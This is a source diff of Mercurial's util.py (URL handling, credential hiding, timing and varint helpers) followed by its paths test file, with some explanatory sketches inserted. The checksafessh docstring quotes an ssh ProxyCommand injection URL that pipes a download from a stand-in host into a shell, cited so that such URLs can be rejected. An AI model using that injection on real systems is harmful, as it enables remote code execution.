3255 return (s, None)
3270 return (s, None)
3256 # authinfo[1] is passed to urllib2 password manager, and its
3271 # authinfo[1] is passed to urllib2 password manager, and its
3257 # URIs must not contain credentials. The host is passed in the
3272 # URIs must not contain credentials. The host is passed in the
3258 # URIs list because Python < 2.4.3 uses only that to search for
3273 # URIs list because Python < 2.4.3 uses only that to search for
3259 # a password.
3274 # a password.
3260 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3275 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3261
3276
3262 def isabs(self):
3277 def isabs(self):
3263 if self.scheme and self.scheme != b'file':
3278 if self.scheme and self.scheme != b'file':
3264 return True # remote URL
3279 return True # remote URL
3265 if hasdriveletter(self.path):
3280 if hasdriveletter(self.path):
3266 return True # absolute for our purposes - can't be joined()
3281 return True # absolute for our purposes - can't be joined()
3267 if self.path.startswith(br'\\'):
3282 if self.path.startswith(br'\\'):
3268 return True # Windows UNC path
3283 return True # Windows UNC path
3269 if self.path.startswith(b'/'):
3284 if self.path.startswith(b'/'):
3270 return True # POSIX-style
3285 return True # POSIX-style
3271 return False
3286 return False
3272
3287
3273 def localpath(self):
3288 def localpath(self):
3274 # type: () -> bytes
3289 # type: () -> bytes
3275 if self.scheme == b'file' or self.scheme == b'bundle':
3290 if self.scheme == b'file' or self.scheme == b'bundle':
3276 path = self.path or b'/'
3291 path = self.path or b'/'
3277 # For Windows, we need to promote hosts containing drive
3292 # For Windows, we need to promote hosts containing drive
3278 # letters to paths with drive letters.
3293 # letters to paths with drive letters.
3279 if hasdriveletter(self._hostport):
3294 if hasdriveletter(self._hostport):
3280 path = self._hostport + b'/' + self.path
3295 path = self._hostport + b'/' + self.path
3281 elif (
3296 elif (
3282 self.host is not None and self.path and not hasdriveletter(path)
3297 self.host is not None and self.path and not hasdriveletter(path)
3283 ):
3298 ):
3284 path = b'/' + path
3299 path = b'/' + path
3285 return path
3300 return path
3286 return self._origpath
3301 return self._origpath
3287
3302
3288 def islocal(self):
3303 def islocal(self):
3289 '''whether localpath will return something that posixfile can open'''
3304 '''whether localpath will return something that posixfile can open'''
3290 return (
3305 return (
3291 not self.scheme
3306 not self.scheme
3292 or self.scheme == b'file'
3307 or self.scheme == b'file'
3293 or self.scheme == b'bundle'
3308 or self.scheme == b'bundle'
3294 )
3309 )
3295
3310
3296
3311
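A sketch (in the spirit of the doctests above) of parsing a URL, splitting out credentials with authinfo(), and using the copy() method added in this change to tweak a duplicate without touching the original. The URL itself is a placeholder.

u = url(b'https://joe:secret@example.com:8443/repo?style=raw#tip')
s, auth = u.authinfo()       # s is the URL with user/password stripped
v = u.copy()                 # independent duplicate
v.fragment = None            # dropping the fragment on the copy...
assert u.fragment == b'tip'  # ...leaves the original untouched
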
3297 def hasscheme(path):
3312 def hasscheme(path):
3298 # type: (bytes) -> bool
3313 # type: (bytes) -> bool
3299 return bool(url(path).scheme) # cast to help pytype
3314 return bool(url(path).scheme) # cast to help pytype
3300
3315
3301
3316
3302 def hasdriveletter(path):
3317 def hasdriveletter(path):
3303 # type: (bytes) -> bool
3318 # type: (bytes) -> bool
3304 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3319 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3305
3320
3306
3321
3307 def urllocalpath(path):
3322 def urllocalpath(path):
3308 # type: (bytes) -> bytes
3323 # type: (bytes) -> bytes
3309 return url(path, parsequery=False, parsefragment=False).localpath()
3324 return url(path, parsequery=False, parsefragment=False).localpath()
3310
3325
3311
3326
3312 def checksafessh(path):
3327 def checksafessh(path):
3313 # type: (bytes) -> None
3328 # type: (bytes) -> None
3314 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3329 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3315
3330
3316 This is a sanity check for ssh urls. ssh will parse the first item as
3331 This is a sanity check for ssh urls. ssh will parse the first item as
3317 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3332 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3318 Let's reject these potentially exploitable urls entirely and warn the
3333 Let's reject these potentially exploitable urls entirely and warn the
3319 user.
3334 user.
3320
3335
3321 Raises an error.Abort when the url is unsafe.
3336 Raises an error.Abort when the url is unsafe.
3322 """
3337 """
3323 path = urlreq.unquote(path)
3338 path = urlreq.unquote(path)
3324 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3339 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3325 raise error.Abort(
3340 raise error.Abort(
3326 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3341 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3327 )
3342 )
3328
3343
3329
3344
3330 def hidepassword(u):
3345 def hidepassword(u):
3331 # type: (bytes) -> bytes
3346 # type: (bytes) -> bytes
3332 '''hide user credential in a url string'''
3347 '''hide user credential in a url string'''
3333 u = url(u)
3348 u = url(u)
3334 if u.passwd:
3349 if u.passwd:
3335 u.passwd = b'***'
3350 u.passwd = b'***'
3336 return bytes(u)
3351 return bytes(u)
3337
3352
3338
3353
3339 def removeauth(u):
3354 def removeauth(u):
3340 # type: (bytes) -> bytes
3355 # type: (bytes) -> bytes
3341 '''remove all authentication information from a url string'''
3356 '''remove all authentication information from a url string'''
3342 u = url(u)
3357 u = url(u)
3343 u.user = u.passwd = None
3358 u.user = u.passwd = None
3344 return bytes(u)
3359 return bytes(u)
3345
3360
3346
3361
3347 timecount = unitcountfn(
3362 timecount = unitcountfn(
3348 (1, 1e3, _(b'%.0f s')),
3363 (1, 1e3, _(b'%.0f s')),
3349 (100, 1, _(b'%.1f s')),
3364 (100, 1, _(b'%.1f s')),
3350 (10, 1, _(b'%.2f s')),
3365 (10, 1, _(b'%.2f s')),
3351 (1, 1, _(b'%.3f s')),
3366 (1, 1, _(b'%.3f s')),
3352 (100, 0.001, _(b'%.1f ms')),
3367 (100, 0.001, _(b'%.1f ms')),
3353 (10, 0.001, _(b'%.2f ms')),
3368 (10, 0.001, _(b'%.2f ms')),
3354 (1, 0.001, _(b'%.3f ms')),
3369 (1, 0.001, _(b'%.3f ms')),
3355 (100, 0.000001, _(b'%.1f us')),
3370 (100, 0.000001, _(b'%.1f us')),
3356 (10, 0.000001, _(b'%.2f us')),
3371 (10, 0.000001, _(b'%.2f us')),
3357 (1, 0.000001, _(b'%.3f us')),
3372 (1, 0.000001, _(b'%.3f us')),
3358 (100, 0.000000001, _(b'%.1f ns')),
3373 (100, 0.000000001, _(b'%.1f ns')),
3359 (10, 0.000000001, _(b'%.2f ns')),
3374 (10, 0.000000001, _(b'%.2f ns')),
3360 (1, 0.000000001, _(b'%.3f ns')),
3375 (1, 0.000000001, _(b'%.3f ns')),
3361 )
3376 )
3362
3377
3363
3378
3364 @attr.s
3379 @attr.s
3365 class timedcmstats(object):
3380 class timedcmstats(object):
3366 """Stats information produced by the timedcm context manager on entering."""
3381 """Stats information produced by the timedcm context manager on entering."""
3367
3382
3368 # the starting value of the timer as a float (meaning and resulution is
3383 # the starting value of the timer as a float (meaning and resulution is
3369 # platform dependent, see util.timer)
3384 # platform dependent, see util.timer)
3370 start = attr.ib(default=attr.Factory(lambda: timer()))
3385 start = attr.ib(default=attr.Factory(lambda: timer()))
3371 # the number of seconds as a floating point value; starts at 0, updated when
3386 # the number of seconds as a floating point value; starts at 0, updated when
3372 # the context is exited.
3387 # the context is exited.
3373 elapsed = attr.ib(default=0)
3388 elapsed = attr.ib(default=0)
3374 # the number of nested timedcm context managers.
3389 # the number of nested timedcm context managers.
3375 level = attr.ib(default=1)
3390 level = attr.ib(default=1)
3376
3391
3377 def __bytes__(self):
3392 def __bytes__(self):
3378 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3393 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3379
3394
3380 __str__ = encoding.strmethod(__bytes__)
3395 __str__ = encoding.strmethod(__bytes__)
3381
3396
3382
3397
3383 @contextlib.contextmanager
3398 @contextlib.contextmanager
3384 def timedcm(whencefmt, *whenceargs):
3399 def timedcm(whencefmt, *whenceargs):
3385 """A context manager that produces timing information for a given context.
3400 """A context manager that produces timing information for a given context.
3386
3401
3387 On entering a timedcmstats instance is produced.
3402 On entering a timedcmstats instance is produced.
3388
3403
3389 This context manager is reentrant.
3404 This context manager is reentrant.
3390
3405
3391 """
3406 """
3392 # track nested context managers
3407 # track nested context managers
3393 timedcm._nested += 1
3408 timedcm._nested += 1
3394 timing_stats = timedcmstats(level=timedcm._nested)
3409 timing_stats = timedcmstats(level=timedcm._nested)
3395 try:
3410 try:
3396 with tracing.log(whencefmt, *whenceargs):
3411 with tracing.log(whencefmt, *whenceargs):
3397 yield timing_stats
3412 yield timing_stats
3398 finally:
3413 finally:
3399 timing_stats.elapsed = timer() - timing_stats.start
3414 timing_stats.elapsed = timer() - timing_stats.start
3400 timedcm._nested -= 1
3415 timedcm._nested -= 1
3401
3416
3402
3417
3403 timedcm._nested = 0
3418 timedcm._nested = 0
3404
3419
3405
3420
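# Illustrative sketch (editor's addition, not part of this changeset): timedcm
# is used as a plain context manager; the yielded timedcmstats carries the
# elapsed time once the block exits, and nesting shows up in its `level`.
def _demo_timedcm():
    with timedcm(b'outer work') as outer:
        with timedcm(b'inner work') as inner:
            sum(range(1000))
    # after exit: inner.level == 2 and outer.elapsed >= inner.elapsed (roughly)
    return outer, inner
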
def timed(func):
    """Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

        @util.timed
        def foo(a, b, c):
            pass
    """

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write(
            b'%s%s: %s\n'
            % (
                b' ' * time_stats.level * 2,
                pycompat.bytestr(func.__name__),
                time_stats,
            )
        )
        return result

    return wrapper


_sizeunits = (
    (b'm', 2 ** 20),
    (b'k', 2 ** 10),
    (b'g', 2 ** 30),
    (b'kb', 2 ** 10),
    (b'mb', 2 ** 20),
    (b'gb', 2 ** 30),
    (b'b', 1),
)


def sizetoint(s):
    # type: (bytes) -> int
    """Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    """
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[: -len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)


class hooks(object):
    """A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources."""

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

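# Illustrative sketch (editor's addition, not part of this changeset): hooks
# run in lexicographic order of their source names, not registration order.
def _demo_hooks():
    calls = []
    h = hooks()
    h.add(b'zz-late', lambda: calls.append(b'late'))
    h.add(b'aa-early', lambda: calls.append(b'early'))
    h()  # runs b'aa-early' first, then b'zz-late'
    return calls  # [b'early', b'late']
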
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    """Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    """
    entries = [
        (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
        for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
    ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)


def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    """Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    """
    if otherf:
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace


def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = b'%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

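# Illustrative sketch (editor's addition, not part of this changeset): with a
# context/other-set that already holds b'file.txt~orig', the first free name
# returned is b'file.txt~orig~1'.
def _demo_safename():
    taken = {b'file.txt~orig'}
    return safename(b'file.txt', b'orig', ctx=taken, others=set())
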
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s


def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)


def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7

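# Illustrative sketch (editor's addition, not part of this changeset): the two
# helpers above round-trip through anything with a .read(N) method, e.g.
# io.BytesIO.
def _demo_uvarint_roundtrip():
    import io

    for value in (0, 1, 127, 128, 1337, 65536):
        encoded = uvarintencode(value)
        assert uvarintdecodestream(io.BytesIO(encoded)) == value
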
# Passing the '' locale means that the locale should be set according to the
# user settings (environment variables).
# Python sometimes avoids setting the global locale settings. When interfacing
# with C code (e.g. the curses module or the Subversion bindings), the global
# locale settings must be initialized correctly. Python 2 does not initialize
# the global locale settings on interpreter startup. Python 3 sometimes
# initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
# explicitly initialize it to get consistent behavior if it's not already
# initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
# LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
# if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    oldloc = locale.setlocale(locale.LC_CTYPE, None)
    if oldloc == 'C':
        try:
            try:
                locale.setlocale(locale.LC_CTYPE, '')
            except locale.Error:
                # The likely case is that the locale from the environment
                # variables is unknown.
                pass
            yield
        finally:
            locale.setlocale(locale.LC_CTYPE, oldloc)
    else:
        yield

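# Illustrative sketch (editor's addition, not part of this changeset):
# with_lc_ctype() is meant to wrap the few call sites that hand control to
# locale-sensitive C code (curses, Subversion bindings, ...).
def _demo_with_lc_ctype():
    with with_lc_ctype():
        # Inside the block, LC_CTYPE follows the user's environment instead of
        # the default "C" locale; it is restored on exit.
        pass
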
def _estimatememory():
    # type: () -> Optional[int]
    """Provide an estimate for the available system memory in Bytes.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
        from ctypes.wintypes import (  # pytype: disable=import-error
            Structure,
            byref,
            sizeof,
            windll,
        )

        class MEMORYSTATUSEX(Structure):
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        x.dwLength = sizeof(x)
        windll.kernel32.GlobalMemoryStatusEx(byref(x))
        return x.ullAvailPhys

    # On newer Unix-like systems and Mac OSX, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
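# Illustrative sketch (editor's addition, not part of this changeset): callers
# should treat the estimate as best effort and fall back to a conservative
# default when the platform cannot provide one.
def _demo_memory_budget(default=256 * 2 ** 20):
    available = _estimatememory()
    if available is None:
        return default
    # never claim more than half of the estimated available memory
    return min(default, available // 2)
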
@@ -1,336 +1,372 @@
$ hg init a
$ hg clone a b
updating to branch default
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cd a

with no paths:

$ hg paths
$ hg paths unknown
not found!
[1]
$ hg paths -Tjson
[
]

with paths:

$ echo '[paths]' >> .hg/hgrc
$ echo 'dupe = ../b#tip' >> .hg/hgrc
$ echo 'expand = $SOMETHING/bar' >> .hg/hgrc
$ hg in dupe
comparing with $TESTTMP/b
no changes found
[1]
$ cd ..
$ hg -R a in dupe
comparing with $TESTTMP/b
no changes found
[1]
$ cd a
$ hg paths
dupe = $TESTTMP/b#tip
expand = $TESTTMP/a/$SOMETHING/bar
$ SOMETHING=foo hg paths
dupe = $TESTTMP/b#tip
expand = $TESTTMP/a/foo/bar
#if msys
$ SOMETHING=//foo hg paths
dupe = $TESTTMP/b#tip
expand = /foo/bar
#else
$ SOMETHING=/foo hg paths
dupe = $TESTTMP/b#tip
expand = /foo/bar
#endif
$ hg paths -q
dupe
expand
$ hg paths dupe
$TESTTMP/b#tip
$ hg paths -q dupe
$ hg paths unknown
not found!
[1]
$ hg paths -q unknown
[1]

formatter output with paths:

$ echo 'dupe:pushurl = https://example.com/dupe' >> .hg/hgrc
$ hg paths -Tjson | sed 's|\\\\|\\|g'
[
{
"name": "dupe",
"pushurl": "https://example.com/dupe",
"url": "$TESTTMP/b#tip"
},
{
"name": "expand",
"url": "$TESTTMP/a/$SOMETHING/bar"
}
]
$ hg paths -Tjson dupe | sed 's|\\\\|\\|g'
[
{
"name": "dupe",
"pushurl": "https://example.com/dupe",
"url": "$TESTTMP/b#tip"
}
]
$ hg paths -Tjson -q unknown
[
]
[1]

log template:

(behaves as a {name: path-string} dict by default)

$ hg log -rnull -T '{peerurls}\n'
dupe=$TESTTMP/b#tip expand=$TESTTMP/a/$SOMETHING/bar
$ hg log -rnull -T '{join(peerurls, "\n")}\n'
dupe=$TESTTMP/b#tip
expand=$TESTTMP/a/$SOMETHING/bar
$ hg log -rnull -T '{peerurls % "{name}: {url}\n"}'
dupe: $TESTTMP/b#tip
expand: $TESTTMP/a/$SOMETHING/bar
$ hg log -rnull -T '{get(peerurls, "dupe")}\n'
$TESTTMP/b#tip

(sub options can be populated by map/dot operation)

$ hg log -rnull \
> -T '{get(peerurls, "dupe") % "url: {url}\npushurl: {pushurl}\n"}'
url: $TESTTMP/b#tip
pushurl: https://example.com/dupe
$ hg log -rnull -T '{peerurls.dupe.pushurl}\n'
https://example.com/dupe

(in JSON, it's a dict of urls)

$ hg log -rnull -T '{peerurls|json}\n' | sed 's|\\\\|/|g'
{"dupe": "$TESTTMP/b#tip", "expand": "$TESTTMP/a/$SOMETHING/bar"}

password should be masked in plain output, but not in machine-readable/template
output:

$ echo 'insecure = http://foo:insecure@example.com/' >> .hg/hgrc
$ hg paths insecure
http://foo:***@example.com/
$ hg paths -Tjson insecure
[
{
"name": "insecure",
"url": "http://foo:insecure@example.com/"
}
]
$ hg log -rnull -T '{get(peerurls, "insecure")}\n'
http://foo:insecure@example.com/

zeroconf wraps ui.configitems(), which shouldn't crash at least:

$ hg paths --config extensions.zeroconf=
dupe = $TESTTMP/b#tip
dupe:pushurl = https://example.com/dupe
expand = $TESTTMP/a/$SOMETHING/bar
insecure = http://foo:***@example.com/

$ cd ..

sub-options for an undeclared path are ignored

$ hg init suboptions
$ cd suboptions

$ cat > .hg/hgrc << EOF
> [paths]
> path0 = https://example.com/path0
> path1:pushurl = https://example.com/path1
> EOF
$ hg paths
path0 = https://example.com/path0

unknown sub-options aren't displayed

$ cat > .hg/hgrc << EOF
> [paths]
> path0 = https://example.com/path0
> path0:foo = https://example.com/path1
> EOF

$ hg paths
path0 = https://example.com/path0

:pushurl must be a URL

$ cat > .hg/hgrc << EOF
> [paths]
> default = /path/to/nothing
> default:pushurl = /not/a/url
> EOF

$ hg paths
(paths.default:pushurl not a URL; ignoring)
default = /path/to/nothing

#fragment is not allowed in :pushurl

$ cat > .hg/hgrc << EOF
> [paths]
> default = https://example.com/repo
> invalid = https://example.com/repo
> invalid:pushurl = https://example.com/repo#branch
> EOF

$ hg paths
("#fragment" in paths.invalid:pushurl not supported; ignoring)
default = https://example.com/repo
invalid = https://example.com/repo
invalid:pushurl = https://example.com/repo

$ cd ..

'file:' disables [paths] entries for clone destination

$ cat >> $HGRCPATH <<EOF
> [paths]
> gpath1 = http://hg.example.com
> EOF

$ hg clone a gpath1
abort: cannot create new http repository
[255]

$ hg clone a file:gpath1
updating to branch default
0 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cd gpath1
$ hg -q id
000000000000

$ cd ..

Testing path referencing other paths
====================================

basic setup
-----------

$ ls -1
a
b
gpath1
suboptions
$ hg init chained_path
$ cd chained_path
$ cat << EOF > .hg/hgrc
> [paths]
> default=../a
> other_default=path://default
> path_with_branch=../branchy#foo
> other_branch=path://path_with_branch
> other_branched=path://path_with_branch#default
> pushdest=../push-dest
> pushdest:pushrev=default
> pushdest2=path://pushdest
> pushdest-overwrite=path://pushdest
> pushdest-overwrite:pushrev=foo
> EOF

$ hg init ../branchy
$ hg init ../push-dest
$ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5'
$ hg log -G -T '{branch}\n' -R ../branchy
o foo
|
o foo
|
o foo
|
o foo
|
o foo
|
| o default
| |
| o default
| |
| o default
|/
o default


$ hg paths
default = $TESTTMP/a
gpath1 = http://hg.example.com/
other_branch = $TESTTMP/branchy#foo
other_branched = $TESTTMP/branchy#default
other_default = $TESTTMP/a
path_with_branch = $TESTTMP/branchy#foo
pushdest = $TESTTMP/push-dest
pushdest:pushrev = default
pushdest-overwrite = $TESTTMP/push-dest
pushdest-overwrite:pushrev = foo
pushdest2 = $TESTTMP/push-dest
pushdest2:pushrev = default

test basic chaining
-------------------

$ hg path other_default
$TESTTMP/a
$ hg pull default
pulling from $TESTTMP/a
no changes found
$ hg pull other_default
pulling from $TESTTMP/a
no changes found

test inheritance of the #fragment part
--------------------------------------

$ hg pull path_with_branch
pulling from $TESTTMP/branchy
adding changesets
adding manifests
adding file changes
added 6 changesets with 0 changes to 0 files
new changesets 1ea73414a91b:bcebb50b77de
(run 'hg update' to get a working copy)
$ hg pull other_branch
pulling from $TESTTMP/branchy
no changes found
$ hg pull other_branched
pulling from $TESTTMP/branchy
searching for changes
adding changesets
adding manifests
adding file changes
added 3 changesets with 0 changes to 0 files (+1 heads)
new changesets 66f7d451a68b:2dc09a01254d
(run 'hg heads' to see heads)

test inheritance of the suboptions
----------------------------------

$ hg push pushdest
pushing to $TESTTMP/push-dest
searching for changes
adding changesets
adding manifests
adding file changes
added 4 changesets with 0 changes to 0 files
$ hg push pushdest2
pushing to $TESTTMP/push-dest
searching for changes
no changes found
[1]
$ hg push pushdest-overwrite --new-branch
pushing to $TESTTMP/push-dest
searching for changes
adding changesets
adding manifests
adding file changes
added 5 changesets with 0 changes to 0 files (+1 heads)

Test chaining path:// definition
--------------------------------

This is currently unsupported, but feel free to implement the necessary
dependency detection.

$ cat << EOF >> .hg/hgrc
> chain_path=path://other_default
> EOF

$ hg id
000000000000
$ hg path
abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
[255]
$ hg pull chain_path
abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
[255]

Doing an actual circle should always be an issue

$ cat << EOF >> .hg/hgrc
> rock=path://cissors
> cissors=path://paper
> paper=path://rock
> EOF

$ hg id
000000000000
$ hg path
abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
[255]
$ hg pull chain_path
abort: cannot use `path://other_default`, "other_default" is also define as a `path://`
[255]
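
A possible shape for that dependency detection (an editor's sketch only; the
helper below is hypothetical and not part of Mercurial's API): resolve
`path://` references recursively and refuse any name that is already on the
resolution stack, which covers both plain chains like `chain_path` above and
genuine cycles like rock/cissors/paper.

  # hypothetical sketch, Python
  def resolve_path_refs(paths):
      """Expand path:// references in a {name: value} dict, detecting cycles."""
      resolved = {}

      def resolve(name, stack):
          if name in stack:
              raise ValueError(b'circular path:// reference: %s' % name)
          value = paths[name]
          if value.startswith(b'path://'):
              target = value[len(b'path://') :]
              value = resolve(target, stack + [name])
          resolved[name] = value
          return value

      for name in paths:
          resolve(name, [])
      return resolved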